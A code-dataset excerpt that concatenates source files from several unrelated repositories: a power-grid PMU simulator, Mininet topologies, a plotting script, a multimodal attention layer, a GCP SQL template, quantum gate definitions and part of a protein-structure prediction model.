anunit = (c_int*len(anuni))(*anuni)
digunit = (c_int*len(diguni))(*diguni)
pmu = PMU(idcode, message_time_quality,
stn, data_format, phnmr,
annmr, dgnmr, chnam, phunit, None, None,
fnom, cfgcnt, data_rate, time_base, IP, 4712)
return pmu
def data_process(raw_data, pmu):#phnmr, annmr, dgnmr, freq, dfreq):
data = raw_data.split()
phasor_data = []
analog_data = []
digital_data = []
for x in range(0, pmu.phnmr*2):
phasor_data.append(float(data[x]))
for x in range(pmu.phnmr*2, pmu.phnmr *2 + pmu.annmr):
analog_data.append(float(data[x]))
for x in range(pmu.phnmr *2 + pmu.annmr, pmu.phnmr*2 + pmu.annmr + pmu.dgnmr):
digital_data.appendfloat((data[x]))
freq = float(data[pmu.phnmr*2+pmu.annmr+pmu.dgnmr])
dfreq = float(data[pmu.phnmr*2+pmu.annmr+pmu.dgnmr+1])
ph_data = (c_float*len(phasor_data))(*phasor_data)
an_data = (c_float*len(analog_data))(*analog_data)
dg_data = (c_float*len(digital_data))(*digital_data)
freq_data = (c_float)(freq)
dfreq_data = (c_float)(dfreq)
return ph_data, an_data, dg_data, freq_data, dfreq_data
def pad(d,size):
data=d
room = size-len(data)
if room > 0:
for x in range(room):
data+=' '
elif room < 0:
data=data[:(abs(room))]
return data
#scheduler function
def do_every(interval, worker_func, iterations = 0):
if iterations !=1:
threading.Timer (interval,do_every, [interval, worker_func, 0 if iterations == 0 else iterations-1]
).start()
worker_func()
def request_data():
update = ('update b p pre_pmu post_pmu %s a1 0\n'% time.time())
pipe.send_sync_event(update.encode('UTF-8'), pipin)
pmu = read_pmu('./models/pmu.config')
_cfg2(pmu)
do_every(0.3,request_data)
while 1:
raw_message=pipe.listen(pipout)
if raw_message:
message=raw_message[0]
if message[0] == 'cfg2':
_cfg2(pmu)
else:
raw_data = raw_message
#raw_data = '7199.36 0.1 7199.37 -2.27 7199.36 2.27 334.51 -0.6225 59.9 0.01'
phasor_data, analog_data, digital_data, freq_data, dfreq_data = data_process(raw_data,pmu)
_data(pmu, phasor_data, analog_data, digital_data, freq_data, dfreq_data)
print('Sent')
```
#### File: models/tomacs_use/load.py
```python
# get value from opendss
# send value of load to control center
import pipe
import sys
import time
import threading
import zmq
import os
import logging
TIME_INT = 0.15
Load_ID = sys.argv[1]
server_IP = sys.argv[2]
server_Port = sys.argv[3]
contextOut = zmq.Context()
clientOut = contextOut.socket(zmq.REQ)
clientOut.connect("tcp://%s:%s" % (server_IP,server_Port))
# open pipe to communicate to opendss
logging.basicConfig(filename='%s.log'%Load_ID,level=logging.DEBUG)
pipeout = pipe.setup_pipe_l(Load_ID)
pipin = pipe.setup_pipe_w()
# send to control center
def send_cc(val):
logging.debug('sending %s to cc at time %s'%(val,time.time()))
val = '%s %s'%(Load_ID,val)
req_bytes = val.encode('utf-8')
clientOut.send(req_bytes)
status=clientOut.recv()
logging.debug('reply at %s' %time.time())
def get_val():
update = 'update b p get_load_value post_get_load_value %s %s 0\n' %(time.time(),Load_ID)
pipe.send_sync_event(update.encode('UTF-8'), pipin)
while 1:
time.sleep(TIME_INT)
get_val()
x = pipe.listen(pipeout)
if x:
logging.debug(x)
send_cc(x)
``` |
{
"source": "JinLabIIT/VirtualTimeKernel",
"score": 3
} |
#### File: mininet/mininet/topolib.py
```python
"Library of potentially useful topologies for Mininet"
from mininet.topo import Topo
from mininet.net import Mininet
# The build() method is expected to do this:
# pylint: disable=arguments-differ
class TreeTopo( Topo ):
"Topology for a tree network with a given depth and fanout."
def build( self, depth=1, fanout=2 ):
# Numbering: h1..N, s1..M
self.hostNum = 1
self.switchNum = 1
# Build topology
self.addTree( depth, fanout )
def addTree( self, depth, fanout ):
"""Add a subtree starting with node n.
returns: last node added"""
isSwitch = depth > 0
if isSwitch:
node = self.addSwitch( 's%s' % self.switchNum )
self.switchNum += 1
for _ in range( fanout ):
child = self.addTree( depth - 1, fanout )
self.addLink( node, child )
else:
node = self.addHost( 'h%s' % self.hostNum )
self.hostNum += 1
return node
def TreeNet( depth=1, fanout=2, **kwargs ):
"Convenience function for creating tree networks."
topo = TreeTopo( depth, fanout )
return Mininet( topo, **kwargs )
class TorusTopo( Topo ):
"""2-D Torus topology
WARNING: this topology has LOOPS and WILL NOT WORK
with the default controller or any Ethernet bridge
without STP turned on! It can be used with STP, e.g.:
# mn --topo torus,3,3 --switch lxbr,stp=1 --test pingall"""
def build( self, x, y, n=1 ):
"""x: dimension of torus in x-direction
y: dimension of torus in y-direction
n: number of hosts per switch"""
if x < 3 or y < 3:
raise Exception( 'Please use 3x3 or greater for compatibility '
'with 2.1' )
if n == 1:
genHostName = lambda loc, k: 'h%s' % ( loc )
else:
genHostName = lambda loc, k: 'h%sx%d' % ( loc, k )
hosts, switches, dpid = {}, {}, 0
# Create and wire interior
for i in range( 0, x ):
for j in range( 0, y ):
loc = '%dx%d' % ( i + 1, j + 1 )
# dpid cannot be zero for OVS
dpid = ( i + 1 ) * 256 + ( j + 1 )
switch = switches[ i, j ] = self.addSwitch(
's' + loc, dpid='%x' % dpid )
for k in range( 0, n ):
host = hosts[ i, j, k ] = self.addHost( genHostName( loc, k + 1 ) )
self.addLink( host, switch )
# Connect switches
for i in range( 0, x ):
for j in range( 0, y ):
sw1 = switches[ i, j ]
sw2 = switches[ i, ( j + 1 ) % y ]
sw3 = switches[ ( i + 1 ) % x, j ]
self.addLink( sw1, sw2 )
self.addLink( sw1, sw3 )
# pylint: enable=arguments-differ
```
#### File: VirtualTimeKernel/vt_userspace/plot_avg.py
```python
import numpy as np
import matplotlib.pyplot as plt
import argparse
def plot_err(data1, data2):
err_data = []
for x, y in zip(data1, data2):
e = abs(x - y * dilation)
if e < 1:
e = 1
err_data.append(e)
print err_data
fig = plt.figure()
plt.plot(data1, err_data, '--b^')
plt.xlabel('Duration / Microseconds')
plt.ylabel('Error / Microseconds')
plt.grid(True)
ax = fig.add_subplot(1, 1, 1)
ax.set_xscale('log')
ax.set_yscale('log')
# major_ticks = np.arange(0, 1.1 * max(err_data), max(err_data) / 10)
# ax.set_yticks(major_ticks)
# plt.ylim(0, 1.1 * max(err_data))
plt.savefig(output_filename, format='eps')
def import_data(data1, data2):
data = np.loadtxt(input_filename)
for x in data:
data1.append(float(x[0]))
data2.append(float(x[1]))
def main():
data1 = []
data2 = []
import_data(data1, data2)
plot_err(data1, data2)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--input', action='store', dest='input_filename')
parser.add_argument('--output', action='store', dest='output_filename')
parser.add_argument('--dilation', action='store', dest='dilation')
results = parser.parse_args()
input_filename = results.input_filename
output_filename = results.output_filename
dilation = int(results.dilation)
main()
``` |
{
"source": "jinlafan/mmt-dropnet",
"score": 2
} |
#### File: layers/attention/hierarchical.py
```python
import random
import torch
from torch import nn
from ...utils.nn import get_activation_fn
# <NAME>., & <NAME>. (2017). Attention Strategies for Multi-Source
# Sequence-to-Sequence Learning. In Proceedings of the 55th Annual Meeting of
# the Association for Computational Linguistics (Volume 2: Short Papers)
# (Vol. 2, pp. 196-202). [Code contributed by @jlibovicky]
class HierarchicalAttention(nn.Module):
"""Hierarchical attention over multiple modalities."""
def __init__(self, ctx_dims, hid_dim, mid_dim, att_activ='tanh', dropnet=False, \
dropnet_image_rate=0.15, dropnet_text_rate=0.15):
super().__init__()
self.activ = get_activation_fn(att_activ)
self.ctx_dims = ctx_dims
self.hid_dim = hid_dim
self.mid_dim = mid_dim
self.dropnet = dropnet
self.dropnet_image_rate = dropnet_image_rate
self.dropnet_text_rate = dropnet_text_rate
self.ctx_projs = nn.ModuleList([
nn.Linear(dim, mid_dim, bias=False) for dim in self.ctx_dims])
self.dec_proj = nn.Linear(hid_dim, mid_dim, bias=True)
self.mlp = nn.Linear(self.mid_dim, 1, bias=False)
def forward(self, contexts, hid):
# contexts[0] --> textual context
# contexts[1] --> visual context
dec_state_proj = self.dec_proj(hid)
ctx_projected = torch.cat([
p(ctx).unsqueeze(0) for p, ctx
in zip(self.ctx_projs, contexts)], dim=0)
energies = self.mlp(self.activ(dec_state_proj + ctx_projected))
att_dist = nn.functional.softmax(energies, dim=0)
ctxs_cat = torch.cat([c.unsqueeze(0) for c in contexts])
# dropnet mechanism
if self.training == True:
if self.dropnet == True:
x = random.choices([0, 1, 2], k=1, weights=[self.dropnet_image_rate, \
self.dropnet_text_rate, 1-self.dropnet_image_rate-self.dropnet_text_rate])[0]
# use only textual context
if x == 0:
joint_context = (att_dist * ctxs_cat)[0]
# use only image context
elif x == 1:
joint_context = (att_dist * ctxs_cat)[1]
# use both visual and textual contexts (i.e. multimodal context)
else:
joint_context = (att_dist * ctxs_cat).sum(0)
else:
joint_context = (att_dist * ctxs_cat).sum(0)
else:
joint_context = (att_dist * ctxs_cat).sum(0)
return att_dist, joint_context
``` |
{
"source": "Jinli213/csye6225-fall2017",
"score": 2
} |
#### File: infrastructure/gcp/sql-template.py
```python
def GenerateConfig(context):
"""Creates the SQL instance."""
resources = [{
'name': 'csye6225-cloud-sql',
'type': 'sqladmin.v1beta4.instance',
'properties': {
"state":"RUNNABLE",
"backendType": "SECOND_GEN",
"databaseVersion": "MYSQL_5_6",
"region": "us-east1",
"settings": {
"tier": "db-n1-standard-1",
"dataDiskSizeGb": 10,
"dataDiskType": "PD_SSD",
},
"instanceType": "CLOUD_SQL_INSTANCE",
}
}]
return {'resources': resources}
``` |
{
"source": "JinLi711/quantum_circuits",
"score": 3
} |
#### File: quantum_circuits/quantum_circuits/gates.py
```python
from sympy import *
import utils
class Gate(object):
"""Gate class for quantum operations.
Attributes:
name (str): name of the gate
indexes (int or list of ints): indexes to perform the quantum gate on
gate (sympy Matrix): gate operation
template (str): template for OpenQASM conversion code
"""
def __init__(self, name, indexes, gate, template):
self.name = name
self.indexes = indexes
self.gate = gate
self.template = template
def __call__(self):
return self.gate
def __repr__(self):
return 'Gate.' + self.name + '_gate'
class U3_gate(Gate):
def __init__(self, phi, theta, lambda_, indexes=None):
self.phi = phi
self.theta = theta
self.lambda_ = lambda_
gate = Matrix([
[E ** (-I * (phi + lambda_) / 2.0) * cos(theta / 2.0),
-E ** (-I * (phi - lambda_) / 2.0) * sin(theta / 2.0)],
[E ** (I * (phi - lambda_) / 2.0) * sin(theta / 2.0),
E** (I * (phi + lambda_) / 2.0) * cos(theta / 2.0)]
])
template = 'u3({},{},{}) q[{}]'.format(theta, phi, lambda_, indexes)
Gate.__init__(self, 'U3', indexes, gate, template)
class U2_gate(Gate):
def __init__(self, phi, lambda_, indexes=None):
self.phi = phi
self.lambda_ = lambda_
gate = U3_gate(phi, pi / 2.0, lambda_)()
template = 'u2({},{}) q[{}]'.format(phi, lambda_, indexes)
Gate.__init__(self, 'U2', indexes, gate, template)
class U1_gate(Gate):
def __init__(self, lambda_, indexes=None):
self.lambda_ = lambda_
gate = exp(0.5*I*lambda_) * U3_gate(0.0, 0.0, lambda_)()
template = 'u1({}) q[{}]'.format(lambda_, indexes)
Gate.__init__(self, 'U1', indexes, gate, template)
class RX_gate(Gate):
def __init__(self, theta, indexes=None):
self.theta = theta
gate = Matrix(simplify(U3_gate(-pi / 2.0, theta, pi / 2.0)()))
template = 'rx({}) q[{}]'.format(theta, indexes)
Gate.__init__(self, 'RX', indexes, gate, template)
class RY_gate(Gate):
def __init__(self, theta, indexes=None):
self.theta = theta
gate = Matrix(simplify(U3_gate(0.0, theta, 0.0)()))
template = 'ry({}) q[{}]'.format(theta, indexes)
Gate.__init__(self, 'RY', indexes, gate, template)
class RZ_gate(Gate):
def __init__(self, theta, indexes=None):
self.theta = theta
gate = Matrix(simplify(U1_gate(theta)()))
template = 'rz({}) q[{}]'.format(theta, indexes)
Gate.__init__(self, 'RZ', indexes, gate, template)
class ID_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U3_gate(0, 0, 0)() ))
template = 'id q[{}]'.format(indexes)
Gate.__init__(self, 'ID', indexes, gate, template)
class X_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(I * U3_gate(0, pi, pi)() ))
template = 'x q[{}]'.format(indexes)
Gate.__init__(self, 'X', indexes, gate, template)
class Y_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(-I * U3_gate(pi / 2, pi, pi/ 2)() ))
template = 'y q[{}]'.format(indexes)
Gate.__init__(self, 'Y', indexes, gate, template)
class Z_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify( U1_gate(pi)() ))
template = 'z q[{}]'.format(indexes)
Gate.__init__(self, 'Z', indexes, gate, template)
class H_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(I * U2_gate(0, pi)() ))
template = 'h q[{}]'.format(indexes)
Gate.__init__(self, 'H', indexes, gate, template)
class S_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U1_gate(pi / 2)() ))
template = 's q[{}]'.format(indexes)
Gate.__init__(self, 'S', indexes, gate, template)
class SDG_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U1_gate(-pi / 2)() ))
template = 'sdg q[{}]'.format(indexes)
Gate.__init__(self, 'SDG', indexes, gate, template)
class T_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U1_gate(pi / 4)() ))
template = 't q[{}]'.format(indexes)
Gate.__init__(self, 'T', indexes, gate, template)
class TDG_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U1_gate(-pi / 4)() ))
template = 'tdg q[{}]'.format(indexes)
Gate.__init__(self, 'TDG', indexes, gate, template)
class CX_gate(Gate):
def __init__(self, indexes=[None, None]):
gate = gate = Matrix([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 1],
[0, 0, 1, 0]
])
template = 'cx q[{}], q[{}]'.format(indexes[0], indexes[1])
Gate.__init__(self, 'CX', indexes, gate, template)
class CCX_gate(Gate):
def __init__(self, indexes=[None, None, None]):
# if cx gate restriction is lifted, we can implement
# the gate in terms of built in gates
gate = Matrix([
[1, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0],
])
# I = I_gate().gate
# H = H_gate().gate
# CX = CX_gate().gate
# T = T_gate().gate
# TDG = TDG_gate().gate
template = 'ccx q[{}], q[{}], q[{}]'.format(
indexes[0],
indexes[1],
indexes[2])
Gate.__init__(self, 'CCX', indexes, gate, template)
```
#### File: quantum_circuits/quantum_circuits/measurements.py
```python
from sympy import *
import numpy as np
import utils
class Measure(object):
def __init__(self, qubit_index, bit_index):
self.template = 'measure q[{}] -> c[{}]'.format(qubit_index, bit_index)
def measure(qubits, basis='z'):
"""Perform a measurement on the qubits.
Args:
qubits (list): list of qubit.Qubit
basis (str): basis used to measure the qubits
Returns:
(str) binary representation of the resulting measurement
"""
if basis == 'z':
qubits = utils.sp_to_np(qubits)
size = qubits.shape[0]
# randomly select the measured bits based on the amplitudes
probabilities = np.absolute(qubits).flatten() ** 2
random_choice = np.random.choice(size, p=probabilities)
binary_choice = utils.int_to_binary(random_choice, int(np.log2(size)))
return binary_choice
else:
raise ValueError('This is not a correct basis measurement.')
``` |
{
"source": "JinLi711/UTGN",
"score": 3
} |
#### File: UTGN/model/model.py
```python
import os
from glob import glob
from copy import deepcopy
from itertools import zip_longest
import numpy as np
import tensorflow as tf
import tensorflow.contrib.layers as layers
from tensorflow.python.ops import control_flow_ops
from geom_ops import *
from net_ops import *
from utils import *
import rnn
import transformer
# Public interface
SCOPE = 'RGN'
DUMMY_LOSS = -1.
LOSS_SCALING_FACTOR = 0.01 # this is to convert recorded losses to angstroms
class RGNModel(object):
"""Recurrent geometric network model
Attributes:
mode: train or predict
config: parameter dictionary
"""
# static variable to control creation of new objects and starting the model
_is_started = False
# ??? Should this be called model number not number of models?
_num_models = 0
def __init__(self, mode, config):
"""Sets up configurations and invokes the TF graph. """
# Make sure model hasn't been started.
if not RGNModel._is_started:
self.mode = mode
self.config = deepcopy(config)
# Set up public methods based on mode (for initial state).
if mode == 'training':
self.start = self._start
else:
self.evaluate = self._evaluate
self.predict = self._predict
# Process config for derived properties
io = self.config.io
arch = self.config.architecture
reg = self.config.regularization
curr = self.config.curriculum
opt = self.config.optimization
init = self.config.initialization
# Test for correct curriculum configuration
if curr['mode'] is None and curr['behavior'] is not None:
raise RuntimeError(
'Must set curriculum mode if curriculum behavior is set.')
elif curr['mode'] is not None and curr['behavior'] is None:
raise RuntimeError(
'Must set curriculum behavior if curriculum mode is set.')
# model name
if io['name'] is None:
io['name'] = 'model_' + str(RGNModel._num_models)
RGNModel._num_models = RGNModel._num_models + 1
# ??? what does this file contain?
# alphabet-related
arch['alphabet'] = np.loadtxt(io['alphabet_file'], delimiter = ',')[:, 6:] \
if io['alphabet_file'] is not None else None
# set alphabet size if implicit
if arch['alphabet'] is not None:
arch['alphabet_size'] = len(arch['alphabet'])
# having multiple alphabets is isomorphic to not reusing alphabet
arch['single_or_no_alphabet'] = type(arch['alphabet_size']) is not list
arch['is_alphabetized'] = 'alphabet' in arch['tertiary_output']
# angularization
arch['is_angularized'] = 'angular' in arch['tertiary_output']
# optimization
if opt['optimizer'] == 'adadelta':
opt.update({'rho': opt['decay']})
# initialization
if arch['higher_order_layers']:
for key in ['recurrent_init']:
if type(init[key]) is not list:
init[key] = [init[key]] * len(arch['recurrent_layer_size'])
if arch['recurrent_nonlinear_out_proj_size'] is not None:
for key in ['recurrent_nonlinear_out_proj_init']:
if type(init[key]) is not list:
init[key] = [init[key]] * len(arch['recurrent_nonlinear_out_proj_size'])
# regularization
for key in ['recurrent_input_keep_probability',
'recurrent_output_keep_probability',
'recurrent_keep_probability',
'recurrent_state_zonein_probability',
'recurrent_memory_zonein_probability',
'alphabet_keep_probability',
'alphabet_normalization']:
if type(reg[key]) is not list:
reg[key] = [reg[key]] * len(arch['recurrent_layer_size'])
# create graph
self._create_graph(mode, self.config)
else:
raise RuntimeError('Model already started; cannot create new objects.')
def _create_graph(self, mode, config):
"""Creates TensorFlow computation graph depending on the mode.
Builds the head (training) graph to start, train, and checkpoint a model.
Or create any number of 'evaluation' models that depend on the head model,
but with additional data sets, different model semantics (e.g. no dropout)
for the evaluation, and logging of their performance.
Two types of internal variables stored in each object:
ops collections, like training_ops, evaluation_ops, etc.
As the graph is built up, ops are added to these lists.
various nodes that are like TF methods, like the initializer, saver, etc,
which are stored in the object and are accessed by various methods when necessary.
Args:
mode: training or predicting
config: dictionary of configuration parameters
"""
# set up appropriate op collections based on mode (for initial state)
if mode == 'training':
# collection of ops to be run at each step of training
self._training_ops = training_ops = {}
# collection of ops for diagnostics like weight norms and curriculum quantiles
self._diagnostic_ops = diagnostic_ops = {}
else:
# collection of ops for evaluation of losses
self._evaluation_ops = evaluation_ops = {}
# collection of ops for the last evaluation in a multi-invocation evaluation
self._last_evaluation_ops = last_evaluation_ops = {}
# collection of ops for prediction of structures
self._prediction_ops = prediction_ops = {}
# set variable scoping, op scoping, and place on appropriate device
with tf.variable_scope(SCOPE, reuse=(mode == 'evaluation')) as scope, \
tf.name_scope(SCOPE + '/' + config.io['name'] + '/'), \
tf.device(_device_function_constructor(
**{k: config.computing[k] for k in ('functions_on_devices', 'default_device')})):
# set graph seed
if mode == 'training':
tf.set_random_seed(config.initialization['graph_seed'])
# Create curriculum state and tracking variables if needed.
if config.curriculum['mode'] is not None:
# Variable to hold current curriculum iteration
curriculum_step = tf.get_variable(
name='curriculum_step',
shape=[],
trainable=False,
initializer=tf.constant_initializer(config.curriculum['base']))
if mode == 'training':
diagnostic_ops.update({'curriculum_step': curriculum_step})
# Set up data ports
if mode == 'training':
self._coordinator = tf.train.Coordinator()
if config.curriculum['mode'] == 'length':
max_length = tf.reduce_min(
[curriculum_step, config.optimization['num_steps']])
max_length = tf.cast(max_length, tf.int32)
else:
max_length = config.optimization['num_steps']
dataflow_config = merge_dicts(
config.io,
config.initialization,
config.optimization,
config.queueing)
ids, primaries, evolutionaries, secondaries, tertiaries, \
masks, num_stepss = _dataflow(dataflow_config, max_length)
# Set up inputs
inputs = _inputs(
merge_dicts(config.architecture, config.initialization),
primaries,
evolutionaries)
# Compute dRMSD weights
# Masks out meaningless (longer than sequence) pairwise distances
# Incorporates curriculum weights
weights_config = merge_dicts(
config.optimization,
config.curriculum,
config.loss,
config.io)
weights, flat_curriculum_weights = _weights(
weights_config,
masks,
curriculum_step if config.curriculum['mode'] == 'loss' else None)
if mode == 'training' and config.curriculum['mode'] == 'loss':
diagnostic_ops.update({'flat_curriculum_weights': flat_curriculum_weights})
# create alphabet if needed and if it will be shared between layers,
# otherwise set to None so that _dihedrals takes care of it
alphabet_config = merge_dicts(
config.architecture,
config.initialization)
if alphabet_config['is_alphabetized'] \
and alphabet_config['single_or_no_alphabet']:
alphabet = _alphabet(mode, alphabet_config)
if mode == 'training' and config.io['log_alphabet']:
diagnostic_ops.update({'alphabet': alphabet})
else:
alphabet = None
for case in switch(config.architecture['internal_representation']):
if case('transformer'):
transformer_config = merge_dicts(
config.initialization,
config.architecture,
config.regularization,
config.optimization)
inputs2 = tf.transpose(inputs, perm=[1,0,2])
recurrent_outputs = transformer._encoder_model(
inputs2,
transformer_config,
mode
)
recurrent_outputs = tf.transpose(
recurrent_outputs,
perm=[1,0,2])
elif case('recurrent'):
# Create recurrent layer(s) that translate
# primary sequences into internal representation
recurrence_config = merge_dicts(
config.initialization,
config.architecture,
config.regularization,
config.optimization,
config.computing, config.io)
# inputs: [NUM_STEPS, BATCH_SIZE, RECURRENT_LAYER_SIZE]
# recurrent_outputs: [NUM_STEPS, BATCH_SIZE, RECURRENT_LAYER_SIZE]
recurrent_outputs, recurrent_states = rnn._higher_recurrence(
mode,
recurrence_config,
inputs,
num_stepss,
alphabet=alphabet)
elif case('none'):
recurrent_outputs = inputs
else:
raise ValueError('Not an available internal representation.')
# Tertiary structure generation
if config.loss['tertiary_weight'] > 0:
# Convert internal representation to
# (thru some number of possible ways) dihedral angles
dihedrals_config = merge_dicts(
config.initialization,
config.optimization,
config.architecture,
config.regularization,
config.io)
dihedrals_config.update({
k: dihedrals_config[k][-1] for k in [
'alphabet_keep_probability',
'alphabet_normalization']})
if not dihedrals_config['single_or_no_alphabet']:
dihedrals_config.update({
'alphabet_size': dihedrals_config['alphabet_size'][-1]})
dihedrals = _dihedrals(
mode,
dihedrals_config,
recurrent_outputs,
alphabet=alphabet)
# Convert dihedrals into full 3D structures and compute dRMSDs
coordinates = _coordinates(
merge_dicts(
config.computing,
config.optimization,
config.queueing),
dihedrals)
drmsds = _drmsds(
merge_dicts(
config.optimization,
config.loss,
config.io),
coordinates,
tertiaries,
weights)
if mode == 'evaluation':
prediction_ops.update({
'ids': ids,
'coordinates': coordinates,
'num_stepss': num_stepss,})
# 'recurrent_states': recurrent_states})
# Losses
if config.loss['include']:
filters = {grp: id_filter(ids, grp) \
for grp in config.io['evaluation_sub_groups']} \
if mode == 'evaluation' else {}
filters.update({'all': tf.tile([True], tf.shape(ids))})
for group_id, group_filter in filters.items():
with tf.variable_scope(group_id):
# Tertiary loss
effective_tertiary_loss = 0.
if config.loss['tertiary_weight'] > 0:
if config.queueing['num_evaluation_invocations'] > 1 \
and mode == 'training':
raise RuntimeError('Cannot use multiple invocations with training mode.')
else:
# Compute tertiary loss quotient parts by reducing dRMSDs
# based on normalization behavior
tertiary_loss_numerator, tertiary_loss_denominator = _reduce_loss_quotient(
merge_dicts(config.loss, config.io, config.optimization),
drmsds,
masks,
group_filter,
name_prefix='tertiary_loss')
# Handles multiple invocations and gracefully degrades for single invocations.
# Variables are created below _per_ evaluation model, which is a deviation from my general design
# the scope of those variables is the evaluation model's, _not_ the training model's as usual
tertiary_loss, min_loss_achieved, min_loss_op, \
update_accu_op, reduce_accu_op = _accumulate_loss(
merge_dicts(config.io, config.queueing),
tertiary_loss_numerator,
tertiary_loss_denominator,
name_prefix='tertiary_loss')
if mode == 'evaluation':
evaluation_ops.update({
'update_accumulator_' + group_id + '_op': update_accu_op})
last_evaluation_ops.update({
'tertiary_loss_' + group_id: tertiary_loss * LOSS_SCALING_FACTOR,
'reduce_accumulator_' + group_id + '_op': reduce_accu_op,
'min_tertiary_loss_achieved_' + group_id: min_loss_achieved * LOSS_SCALING_FACTOR,
'min_tertiary_loss_' + group_id + '_op': min_loss_op})
if config.io['log_model_summaries']:
tf.add_to_collection(
config.io['name'] + '_tertiary_losses',
tertiary_loss)
effective_tertiary_loss = config.loss['tertiary_weight'] * tertiary_loss
# Final loss and related housekeeping
loss = tf.identity(effective_tertiary_loss, name='loss')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # batch_norm related
if update_ops:
loss = control_flow_ops.with_dependencies(
tf.tuple(update_ops),
loss)
if config.io['log_model_summaries']:
tf.add_to_collection(
config.io['name'] + '_losses',
loss)
if group_id == config.curriculum['loss_history_subgroup']:
curriculum_loss = loss
# Curriculum loss history; not always used but design
# is much cleaner if always created.
curriculum_loss_history = tf.get_variable(
initializer=tf.constant_initializer([DUMMY_LOSS] \
* config.curriculum['change_num_iterations']),
shape=[config.curriculum['change_num_iterations']],
trainable=False,
name='curriculum_loss_history')
if mode == 'evaluation' and config.curriculum['update_loss_history']:
update_curriculum_history_op = _history(
config.io,
curriculum_loss,
curriculum_loss_history)
last_evaluation_ops.update({
'update_curriculum_history_op': update_curriculum_history_op})
# Training
if mode == 'training':
# get grads, training ops
self._global_step, minimize_op, grads_and_vars_dict = _training(
config.optimization, loss)
self._grads_and_vars_length = len(grads_and_vars_dict) // 2
# update relevant op dicts
# update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
# if update_ops:
# training_ops.update({'update_ops': tf.tuple(update_ops)})
training_ops.update({
'minimize_op': minimize_op,
'global_step': self._global_step,
'ids': ids})
diagnostic_ops.update(grads_and_vars_dict)
# Curriculum
if mode == 'training' \
and config.curriculum['behavior'] in [
'fixed_rate',
'loss_threshold',
'loss_change']:
curriculum_update_op = _curriculum(
config.curriculum,
curriculum_step,
curriculum_loss_history,
[minimize_op])
training_ops.update({
'curriculum_update_op': curriculum_update_op})
def _train(self, session):
"""Performs one iteration of training.
If applicable, advances the curriculum.
Args:
session: tf session
Returns:
global step
ids
"""
training_dict = ops_to_dict(session, self._training_ops)
return training_dict['global_step'], training_dict['ids']
def _evaluate(self, session, pretty=True):
"""Evaluates loss(es) and returns dicts with the relevant loss(es).
Args:
session: tf session
pretty: pretty print
Returns:
evaluation dict
"""
if RGNModel._is_started:
# evaluate
num_invocations = self.config.queueing['num_evaluation_invocations']
for invocation in range(num_invocations):
if invocation < num_invocations - 1:
evaluation_dict = ops_to_dict(
session,
self._evaluation_ops)
else:
evaluation_dict = ops_to_dict(
session,
merge_dicts(
self._evaluation_ops,
self._last_evaluation_ops))
# write event summaries to disk
if self.config.io['log_model_summaries']:
self._summary_writer.add_summary(
evaluation_dict['merged_summaries_op'],
global_step=evaluation_dict['global_step'])
# remove non-user facing ops
if pretty:
[evaluation_dict.pop(k) for k in list(evaluation_dict.keys()) if 'op' in k]
return evaluation_dict
else:
raise RuntimeError('Model has not been started or has already finished.')
def _predict(self, session):
"""Predict 3D structures.
Args:
session: tf session
Returns:
dict of prediction
"""
if RGNModel._is_started:
# evaluate prediction dict
prediction_dict = ops_to_dict(session, self._prediction_ops)
# process tertiary sequences
if 'coordinates' in prediction_dict:
prediction_dict['coordinates'] = np.transpose(
prediction_dict['coordinates'], (1, 2, 0))
# generate return dict
predictions = {}
for id_, num_steps, tertiary, recurrent_states \
in zip_longest(*[prediction_dict.get(key, []) \
for key in ['ids', 'num_stepss', 'coordinates', 'recurrent_states']]):
prediction = {}
if tertiary is not None:
last_atom = (num_steps - self.config.io['num_edge_residues']) * NUM_DIHEDRALS
prediction.update({'tertiary': tertiary[:, :last_atom]})
prediction.update({'recurrent_states': recurrent_states})
predictions.update({id_: prediction})
return predictions
else:
raise RuntimeError('Model has not been started or has already finished.')
def _diagnose(self, session, pretty=True):
""" Compute diagnostic measurements
Ex. weight norms and curriculum quantiles.
Args:
session: tf session
pretty: pretty print
Returns:
diagnostic dict
"""
# for k, v in self._diagnostic_ops.items():
# print("KEY: ", k, " VALUE: ", v)
diagnostic_dict = ops_to_dict(session, self._diagnostic_ops)
# write event summaries to disk
if self.config.io['log_model_summaries']:
for op in ['merged_summaries_op', 'base_merged_summaries_op']:
self._summary_writer.add_summary(
diagnostic_dict[op],
global_step=diagnostic_dict['global_step'])
# compute max/min of vars and grads
vars_ = [diagnostic_dict['v' + str(i)] \
for i in range(self._grads_and_vars_length)]
grads = [diagnostic_dict['g' + str(i)] \
for i in range(self._grads_and_vars_length)]
diagnostic_dict.update({
'min_weight': np.min([np.min(var) for var in vars_]),
'max_weight': np.max([np.max(var) for var in vars_]),
'min_grad': np.min([np.min(grad) for grad in grads]),
'max_grad': np.max([np.max(grad) for grad in grads])})
# compute curriculum quantiles if applicable.
if self.config.curriculum['mode'] == 'loss':
quantiles = cum_quantile_positions(
diagnostic_dict['flat_curriculum_weights'])
diagnostic_dict.update({'curriculum_quantiles': quantiles})
elif self.config.curriculum['mode'] == 'length':
diagnostic_dict.update({'curriculum_quantiles': float('nan')})
# remove non-user facing ops and tensors
if pretty:
diagnostic_dict.pop('flat_curriculum_weights', None)
for i in range(self._grads_and_vars_length):
diagnostic_dict.pop('v' + str(i))
diagnostic_dict.pop('g' + str(i))
return diagnostic_dict
def _start(self, evaluation_models, session=None,
restore_if_checkpointed=True):
"""Initializes model from scratch or loads state from disk.
